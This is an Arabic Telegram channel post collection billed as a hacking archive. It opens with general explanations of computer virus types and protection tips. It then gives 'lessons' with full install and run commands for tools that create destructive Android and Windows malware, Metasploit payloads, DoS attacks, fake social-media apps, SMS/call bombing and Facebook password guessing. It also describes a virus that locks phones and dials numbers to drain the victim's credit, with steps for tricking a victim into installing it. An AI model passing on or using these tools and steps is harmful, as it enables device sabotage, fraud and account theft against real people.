The Hacking Library
350 subscribers
874 photos
19 videos
44 files
1.3K links
محتوي القناه هو عباره عن تجميع
القناه عباره عن ارشيف للهكرز الأخلاقيات وغير الأخلاقيين
استمتعوا😀👍
Download Telegram
#الفيروسات
وهي من اخطر الأشياء على الجهاز

ما هو الفيروس ؟
هو برنامج مكتوب باحدي لغات البرمجة يستطيع التحكم في برامج الجهاز و اتلفها و تعطيل عمل الجهاز كله و تستطيع نسخ نفسها ..

كيف تحدث الإصابة بالفيروسات ؟
يتنقل الفيروس إلى جهازك عندما تقوم بنقل ملف ملوث بالفيروس إلى جهازك و ينشط الفيروس عند محاولة فتح ذلك الملف و قد يصل ذلك الفيروس من عدة أشياء لك منها انك قد نزلت ملف عليه فيروس من الإنترنت او قد وصلك على البريد على هيئة Attachment وو ..الفيروس عبارة عن برنامج صغير و ليس من شرطا أن يكون للتخريب فمثلا هناك فيروس صممه أحد الفلسطينيين يفتح لك واجهه و يبين بعض الشهداء الفلسطنين و يعطيك بعض المواقع عن فلسطين ...ويمكن عمل هذا الفيروس بطرق كثيره و بسيطة حيث انك يمكن تصميمه بلغات البرمجة أو حتى باستخدام Notpad

اضرار الفيروسات :-
1- انشاء بعض الباد سيكتورس (Bad Sectors) والتي تتلف جزء من الهارد الخاص بك مما يمنعك من استخدام جزء منه ..

2- ابطاء عمل الجهاز بصوره ملحوظة ..

3- تدمير بعض الملفات ..

4- تخريب عمل بعض البرامج و قد تكون هذه البرامج مثل الحماية من الفيروسات مما يشكل خطر رهيب ..

5- اتلاف بعض اجزاء الجهاز (Bios) و الذي قد يجعلك تتضطر الى تغير المز بروت (Mother Board) و الكروت كلها ..

6- قد تفاجأ بختفاء سيكتور من الهارد ..

7- عدم التحكم في بعض الجزاء الجهاز ..

8- انهيار نظام التشغيل ..

9- توقف عمل الجهاز بصوره كاملة ..

خصائص الفيروسات
1- نسخ نفهسا و الانتشار في الجهاز كله ..
2- التغير في بعض البرامج المصابة مثل اضافة مقطع الى ملفاتا لنوت باد في الاخر ..
3- فك و تجميع نفسها و الاختفاء ..
4- فتح منفذ ما في الجهاز او تعطيل عمل بعض الاجزاء فيه ..
5- يضع علامة مميزه على البرامج المصابة تسمى (Virus Mark)
6- البرنامج المصاي بالفيروس بصيب البرامج الاخرى عن طريق وضع نسخه من الفيروس بها ..
7- البرامج المصابة من الممكن ان تعمل عليها دون الشعور بأي خلل فيها لفتره ..

مما يتكون الفيروس؟
1- برنامج فرعي ليصيب البرامج التنفيذية ..
2- برنامج فرعي لبدء عمل الفيروس ..
3- برنامج فرعي لبدء التخريب ..

ماذا يحذث عند الاصابة بفيروس ؟
1- عند فتح برنامج مصاب بالفيروس يبدء الفيروس بالتحكم في الجهاز و يبدء بالبحث عن ملفات ذات امداد .exe او .com او .bat .. حسب الفيروس و ينسخ نفسه بها..

2- عمل علامة خاصة في البرنامج المصاب (Virus Marker) و تختلف من فيروس لاخر ..

3- يقوم الفيروس بالحث عن البرامج و فحص اذا كانت بها العلامه الخاصة به ام لا و اذا كانت غير مصابه ينسخ نفسه بها ..

4- اذا وجد علامته يكمل البحث في باقي البرامج و يصيب كل البرامج ..

ما هي مراحل العدوى ؟
1- مرحلة الكمون :
حيث يختبأ الفيروس في الجهاز لفترة ..
2- مرحلة الانتشار :
و يبدء الفيورس في نسخ نفسه و الاتشار في البرامج و اصبتها و ووضع علامته فيها ..

3- مرحلة جذب الذناد:
و هي مرحلة الانفجار في تاريخ معين او يوم .. مثل فيروس تشرنوبيل ..

4- مرحلة الاضرار :
و يتم فيها تخريب الجهاز ..

أنواع الفيروسات
1: فيروسات قطاع التشغيل (Boot Sector Virus)
وهو الذي ينشط في منطقة نظام التشغيل وهو من اخطر أنواع الفيروسات حيث انه يمنعك من تشغيل الجهاز

2: فيروسات الماكرو (Macro Virus)
وهي من اكثر الفيروسات انتشارا حيث انها تضرب برامج الاوفيس و كما أنها تكتب بالورد او Notpad

3: فيروسات الملفات (File Virus)
وهي تنتشر في الملفات وعند فتح أي ملف يزيد انتشارها ..

4: الفيروسات المخفية (Steath Virus)
وهي التي تحاول آن تختبئ من البرامج المضادة للفيروسات و لكن سهل الإمساك بها

5: الفيروسات المتحولة (Polymorphic virus)
وهي الأصعب على برامج المقاومة حيث انه صعب الإمساك بها وتتغير من جهاز إلي آخر في أوامرها ..ولكن مكتوبة بمستوى غير تقني فيسهل إزالتها

6: فيروسات متعددة الملفات (Multipartite Virus)
تصيب ملفات قطاع التشغيل و سريعة الانتشار ..

7: فيروسات الدودة (Worm)
وهو عبارة عن برنامج ينسخ نفسه على الاجهزه و يأتي من خلال الشبكة و ينسخ نفسه بالجهاز عدة مرات حتى يبطئ الجهاز وهو مصمم لإبطاء الشبكات لا الأجهزة و بعض الناس تقول امه هذا النوع لايعتبر فيروس حيث انه مصمم للإبطاء لا لأزاله الملفات و تخريبها ..

8: الباتشات (Trojans)
وهو أيضا عبارة عن برنامج صغير قد يكون مدمج مع ملف آخر للتخفي عندما ينزله شخص و يفتحه يصيب ال Registry و يفتح عندك منافذ مما يجعل جهازك قابل للاختراق بسهوله و هو يعتبر من أذكى البرامج فمثلا عند عمل سكان هناك بعض التورجن يفك نفسه على هيئة ملفات غير محدده فيمر عليها السكان دون التعرف علية و من ثم يجمع نفسه مره ثانيه

برامج المقاومة

كيف تعمل ؟
هناك طريقتان في البحث عن الفيورسات
1: عندما يكون الفيروس معروف من قبل فتبحث عن التغير المعروف لها مسبقا الذي يسببه ذلك الفيروس

2: عندما يك
ون الفيروس جديد فتبحث عن شئ غير طبيعي في الجهاز حتى تجده و تعرف أي برنامج مسبب له و توقفه ودائما و غالبا تظهر نسخ عديده من الفيورس و لها نفس التخريب مع فروق بسيطة

اشهر الفيروسات
اشهر الفيروسات على الإطلاق هو شيرنوبل و مالسيا و فيروس الحب Love ..

كيف احمي نفسي؟
1: التأكد من نظافة الملفات قبل فتحها مثل exe لانها ملفات تشغيليه واذا ارسلك واحد شي وهو ماهو برنامج وامتداده exe معناه ممكن يكون فيروس

2: عمل سكان كامل على الجهاز كل ثلاث ايام

3: التأكد من تحديث الانتي فايروس كل اسبوع على الاقل (شركة نورتون تطرح تحديث كل يوم او يومين)

4: وضع Firewall جيد

5: وضح Anti-Virus جيد

6: ايقاف خاصية مشاركة الملفات :-
control panal / network / configuration / file and print sharring
i want to be able to give others access to my files
الغي التحديد ثم ok

7: لا تظل مدة طويلة متصل بالشبكة بحيث لو ان واحد دخل عليك ما يظل يخرب فيك و عند خروجك و دخولك مره اخرى للشبكة يغير اخر رقم من الايبي

8: لا تخزن كلمات المرور او كلمات اسر على جهازك (مثل كلمة المرور لاشتراكك في الانترنت او البريد الكتروني او ...)

9: لا تفتح اي ملفات تكون وصلة على بريدك الا بعد التأكد من نظافتها ..

10: اذا لاحظت حدوث اي شئ غريب مثل حلل في اي برامج او خروج و دخول السي دي افصل الاتصال فورا و تأكد من نظافة الجهاز
#CS
إليك 7 أنواع من فيروسات الكمبيوتر الفتاكة التي يجب أن تنتبه إليها أكثر من غيرها


تماما مثل الفيروسات التي تصيب الإنسان، تأتي فيروسات الكمبيوتر بأشكال كثيرة ويمكن أن تؤثر على حاسوبك بطرق مختلفة.
من الواضح أن جهاز الكمبيوتر الخاص بك لن يقضي أسبوعا كاملا دون فيروسات ويحتاج إلى دورة من المضادات الحيوية، ولكن العدوى الشديدة يمكن أن تعيث فسادا في نظامك ويمكنهم حذف ملفاتك، وسرقة بياناتك، والانتشار بسهولة إلى الأجهزة الأخرى على شبكتك.


 فيما يلي نرصد لك سبعة أنواع من فيروسات الكمبيوتر التي يجب أن تنتبه إليها
1-  Boot Sector Virus -  فيروس بدء التشغيل  
من منظور المستخدم، تعد فيروسات Boot Sector من أخطر الفيروسات. ولأنها تصيب سجل التشغيل الرئيسي، فمن الصعب إزالتها، ويقوم هذا النوع من الفيروسات بالتسلل إلى القطاع الخاص ببرنامج الإقلاع على القرص، وإتلاف محتوياته والعبث بها، ما يؤدي إلى تعطل عملية الإقلاع.
تنتشر فيروسات Boot Sector عادة عبر الوسائط القابلة للإزالة وقد وصلت هذه الفيروسات إلى ذروتها في التسعينات عندما كانت الأقراص المرنة هي القاعدة، ولكن ما يزال بإمكانك العثور عليها على محركات أقراص USB وفي مرفقات البريد الإلكتروني. لحسن الحظ، أدت التحسينات في بنية BIOS إلى خفض انتشارها في السنوات القليلة الماضية.
2- Direct Action Virus - فيروس العمل المباشر
فيروس العمل المباشر هو واحد من النوعين الرئيسيين للفيروسات التي لا تثبت نفسها ولا قوتها و تظل مخفية في ذاكرة الكمبيوتر.
يعمل هذا الفيروس عن طريق إرفاق نفسه بنوع معين من الملفات - ملفات  EXE   أو-  COM  .عادة عندما يقوم شخص ما بتنفيذ الملف، فإن هذا الملف ينبض بالحياة، ويبحث عن ملفات أخرى مشابهة في الدليل حتى ينتشر بوحشية تامة.
من الناحية الإيجابية، لا يقوم الفيروس عادة بحذف الملفات ولا يعيق أداء النظام الخاص بك ويصرف نظره عن بعض الملفات التي يتعذر الوصول إليها، هذا النوع من الفيروسات يكون له تأثير ضئيل على المستخدم ويمكن إزالتها بسهولة باستخدام برنامج مكافحة الفيروسات.
3-  Resident Virus - الفيروس المقيم 
خطيرة بكل ما تحمل الكلمة من معنى هذه الفيروسات المقيمة بخلاف فيروسات العمل المباشر، يتم تثبيتها على جهاز الكمبيوتر ويسمح لهم بالعمل حتى عندما يتم القضاء على المصدر الأصلي للعدوى. على هذا النحو، يعتبرها الخبراء أكثر خطورة من ابن عمهم فيروس العمل المباشر الذي ذكرناه سابقا.
اعتمادا على برمجة الفيروس، يمكن أن تكون هذه البرمجة خادعة للكشف وحتى أكثر صعوبة. يمكنك تقسيم الفيروسات المقيمة إلى قسمين : ناقلات سريعة و ناقلات بطيئة. تتسبب الناقلات السريعة في حدوث أكبر قدر من الضرر في أسرع وقت ممكن وبالتالي يسهل اكتشافها، في مقابل ذلك يصعب التعرف على الناقلات البطيئة لأن أعراضها تتطور ببطء.
في أسوأ الحالات، يمكنهم حتى إلحاق الضرر ببرنامج مكافحة الفيروسات، حيث يصيب كل ملف يقوم البرنامج بمسحه. تحتاج غالبا إلى أداة فريدة - مثل تصحيح نظام التشغيل – لإزالة هذا النوع الخطير من الفيروسات بالكامل وبالتالي لن يكون تطبيق مكافحة البرامج الضارة كافيا لحمايتك.
4-  Multipartite Virus -  الفيروسات متعددة الأجزاء 
احذر كثيرا لأنه في حين أن بعض الفيروسات تعشق الانتشار عبر طريقة واحدة أو توصيل حمولة واحدة من حقنها القاتلة، فالفيروسات متعددة الأجزاء تريد الإنتشار بكل الطرق الملتوية. قد ينتشر فيروس من هذا النوع بطرق متعددة، وقد يتخذ إجراءات مختلفة على جهاز كمبيوتر مصاب يعتمد على المتغيرات، مثل نظام التشغيل المثبت أو وجود ملفات معينة.
ويمكنها في نفس الوقت إصابة قطاع التمهيد والملفات القابلة للتنفيذ، مما يسمح لها بالتصرف بسرعة وانتشار سريع.
في الواقع من الصعب إزالته. حتى إذا قمت بتنظيف ملفات برنامج الجهاز، إذا ظل الفيروس في قطاع التمهيد، فسيتم إعادة إنتاجه فورا وبشكل متهور للآسف عند تشغيل الكمبيوتر مرة أخرى.
5- Polymorphic Virus  -  فيروس متعدد الأشكال 
وفقا لـ الشركة العالمية لتطوير برامج الكمبيوتر سيمانتك، تعد الفيروسات متعددة الأشكال واحدة من أخطر الفيروسات التي يصعب اكتشافها أو حتى إزالتها من طرف برامج مكافحة الفيروسات. وتزعم الشركة أن شركات مكافحة الفيروسات تحتاج إلى " قضاء أيام أو أشهر لإنشاء إجراءات دقيقة للقبض على شكل متعدد الأشكال".
لكن لماذا يصعب القضاء على الفيروسات متعددة الأشكال ؟ والدليل موجود في اسمها بالضبط يمكن لبرامج مكافحة الفيروسات وضع قائمة سوداء واحدة فقط لهذا النوع من الفيروس، ولكن الفيروس متعدد الأشكال يغير توقيعه (النمط الثنائي) في كل مرة يتم فيها النسخ المتماثل، وبالنسبة لبرنامج مكافحة الفيروسات قد يجن جنونه لأن الفيروسات متعددة الأشكال يمكنها التملص بسهولة من القائمة السوداء.
6-  Overwrite Virus -    فيروس الكتابة  
 فيروس الكتابة هو أحد أكثر الفيروسات إحباطا، تاب

ع...
 فيروس الكتابة هو
أ

حد أكثر الفيروسات إحباطا، حتى إذا لم يكن خطرا بشكل خاص على نظامك ككل.
هذا لأنه سيحذف محتويات أي ملف يصيبه، الطريقة الوحيدة لإزالة الفيروس هي حذف الملف، وبالتالي تتخلص من كل محتوياته ويمكنه أن يصيب كل من الملفات المستقلة وقطعة كاملة من البرامج.
عادة ما تكون فيروسات الكتابة متخفية ويتم نشرها عبر البريد الإلكتروني، مما يجعل من الصعب تحديدها لمستخدم الكمبيوتر العادي.
7-Spacefiller Virus -  الفيروسات الفضائية    
تعرف أيضا باسم " فيروسات التجويف"  فالفيروسات الفضائية أكثر ذكاءا من معظم نظيراتها. إن طريقة العمل المعتادة للفيروس هي ببساطة إرفاق نفسه بملف ما، ومحاولة الوصول إلى المساحة الفارغة التي يمكن العثور عليها أحيانا داخل الملف نفسه.
تسمح هذه الطريقة بإصابة برنامج دون الإضرار بالشفرة أو زيادة حجمها، وبالتالي تمكينها من تجاوز مضادات الفيروسات إلى تقنيات التخفي المضادة للكشف التي تعتمد عليها الفيروسات الأخرى.
 لحسن الحظ، هذا النوع من الفيروسات نادرة نسبيا، على الرغم من أن نمو ملفات ويندوز القابلة للتنفيذ يمنحهم فرصة جديدة للحياة.
#CS
#الدرس_العاشر

السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater


 طريقه تثبيتها:::-


الاوامر

1-  git clone https://github.com/ERROR4317/viruscreater

2-  cd viruscreater

أمر التشغيل


3- python2 virus.py



انا اخترت رقم 2

صناعه فيروسات قويه و ب انواع مختلفه



#CS
#الدرس_11

اوامر انشاء فيروسات مدمرة للأندرويد والويندوز من
apt update

apt upgrade

apt install python2

apt install git

git clone https://github.com/Hider5/Matermuxx

pip2 install -r requirements.txt

chmod 777 malicious.py

python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
#CS
#الدرس_12
تم تحديث اداه payload5

هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help

للتحديث قم بكتابه 99

تثبيت اداة Payload 5

pkg install git -y

git clone https://github.com/Ali898989/setupp

cd setupp

chmod +x setup.sh

./setup.sh


cd payload5


#CS
اداه jmaxojan5

هي عبارة عن فايروس قوي جدا
مميزات الفايروس
بحرق فلاش الضوء.
بتدمير الاضاءه.
بتغيير الخلفية.
يشغل هزاز الجهاز لمده بدون توقف.
بالاتصال الهاتفي لارقام بدون شعور الضحيه بذلك لكي يتم سحب الرصيد.
باقفال الجهاز برمز سري.
بحذف ما هو موجود في الحافظه.
بحرق الصوت.
بحذف الاشعارات.
بإيقاف و تشغيل wifi عده مرات.
و الكثير من المميزات الفتاكه

اوامر تثبيته

pkg update

pkg upgrade

pkg install git

git clone https://github.com/jmaxojan/jmaxojan5

cd jmaxojan5

bash *

bash .install.sh


سيظهر ملف apk في / sdcard باسم TermuxApi.apk اجعل الضحية يقوم بتثبيته وانتقل إلى الإعدادات> التطبيقات> TermuxApi وقم بتنشيط جميع الأذونات التي طلبها ثم تشغيل bash *

#CS